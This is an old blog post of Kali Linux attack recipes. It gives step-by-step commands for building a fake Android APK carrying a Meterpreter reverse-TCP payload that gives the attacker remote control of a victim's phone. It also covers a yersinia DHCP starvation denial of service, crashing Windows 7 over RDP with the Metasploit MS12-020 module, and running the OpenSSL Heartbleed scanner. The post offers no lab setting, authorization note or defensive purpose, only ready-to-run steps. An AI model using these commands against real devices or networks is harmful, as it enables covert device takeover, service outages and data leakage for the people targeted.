Search This Blog

Tuesday, May 26, 2015

How to get remote control of android device using kali linux.

1. Start terminal and type:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk
[ Lhost=attacker IP address,lport=local port ]
This command will generate fake.apk in home directory.
2.  Type: msfconsole
This command will start the metasploit framework.
3. Type: use exploit/multi/handler
In order to get multiple session on a single multi/handler.
4. Type: set payload android/meterpreter/reverse_tcp
This will provide the reverse connection from victim to attacker computer.
5. Type: show options
It will show  the available options  like  lhost,lport
6. Set LHOST=192.168.0.2
7. Set LPORT=81
8. EXPLOIT




How to perform DHCP DOS attack using yersinia in kali linux.


1. Start terminal and type: yersinia-G  (This will bring up the GUI of yersinia).
2. Now goto DHCP tab
3. Duble click on DHCP
4. Now ,Choose attack pop on your screen
5. Select sending DISCOVER packet
6. Click “ok”

How Yesinia Works???

Whenever user power up the machine it start searching the IP address. DHCP server offer the machine for IP address,as and when our machine respond to the request  of DHCP server. DHCP server provide the IP address from its pool and allocate it your machine mac address.
So yersinia send many discover packet to DHCP server using different MAC Address so all the free IP in DHCP server used ,so genuine request from machine would be unsatisfied.



Steps to perform blue screen of death attack on remote windows 7 PC.


1. Open Kali Linux terminal type msfconsole
2. Now type use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. msf auxiliary(ms12_020_maxchannelids) > show options
4. msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168..1.25
5. msf auxiliary(ms12_020_maxchannelids) > show options
6. msf auxiliary(ms12_020_maxchannelids) > exploit

Note:This exploit will work till windows 7 sp1




How to perform openSSL heartbleed attack in kali linux. 


1.Open Kali linux
2.Run Metaspolit through terminal: msfconsole
3. type:-  use auxiliary/scanner/ssl/openssl_heartbleed
4. msf auxiliary(openssl_heartbleed) > show options
5. msf auxiliary(openssl_heartbleed) > set RHOST <Host Add>
6. msf auxiliary(openssl_heartbleed) > set RPORT 443
7. msf auxiliary(openssl_heartbleed) > set VERBOSE  true
8. msf auxiliary(openssl_heartbleed) > show options
9. msf auxiliary(openssl_heartbleed) > Run

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment